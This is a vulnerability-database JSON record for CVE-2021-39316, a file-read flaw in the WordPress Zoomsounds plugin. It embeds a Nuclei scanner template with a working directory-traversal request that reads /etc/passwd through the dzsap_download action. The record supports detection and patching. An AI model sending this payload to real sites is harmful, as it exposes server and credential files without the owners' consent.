{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2021-39316/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2021-39316/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2021-39316/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2021-39316/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2021-39316/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2021-39316"},"sightings":{"href":"/api/v1/sightings/cve-2021-39316"}},"enrichments":{"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2021/CVE-2021-39316.yaml","nuclei_template_severity":"high","nuclei_template_yaml":"id: CVE-2021-39316\n\ninfo:\n  name: WordPress DZS Zoomsounds <=6.50 - Local File Inclusion\n  author: daffainfo\n  severity: high\n  description: WordPress Zoomsounds plugin 6.45 and earlier allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using directory traversal in the `link` parameter.\n  impact: |\n    Local File Inclusion vulnerability in WordPress DZS Zoomsounds plugin allows an attacker to include arbitrary files from the server, potentially leading to remote code execution or sensitive information disclosure.\n  remediation: |\n    Update to the latest version of WordPress DZS Zoomsounds plugin (>=6.51) to fix the Local File Inclusion vulnerability.\n  reference:\n    - https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd\n    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39316\n    - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39316\n    - http://packetstormsecurity.com/files/165146/WordPress-DZS-Zoomsounds-6.45-Arbitrary-File-Read.html\n    - https://nvd.nist.gov/vuln/detail/CVE-2021-39316\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2021-39316\n    cwe-id: CWE-22\n    epss-score: 0.65763\n    epss-percentile: 0.99244\n    cpe: cpe:2.3:a:digitalzoomstudio:zoomsounds:*:*:*:*:*:wordpress:*:*\n  metadata:\n    max-request: 1\n    vendor: digitalzoomstudio\n    product: zoomsounds\n    framework: wordpress\n  tags: cve2021,cve,wordpress,wp-plugin,zoomsounds,wpscan,packetstorm,wp,lfi,digitalzoomstudio,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd\"\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100aae685d101459e5cfbbe819ffbbf58d3d36c6ab530496aae9b39f2439c0e9d68022046496ef2263a7c9ad490ca4333f22c2d3a117a3e02dee91904b4707954d14972:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2021-39316"}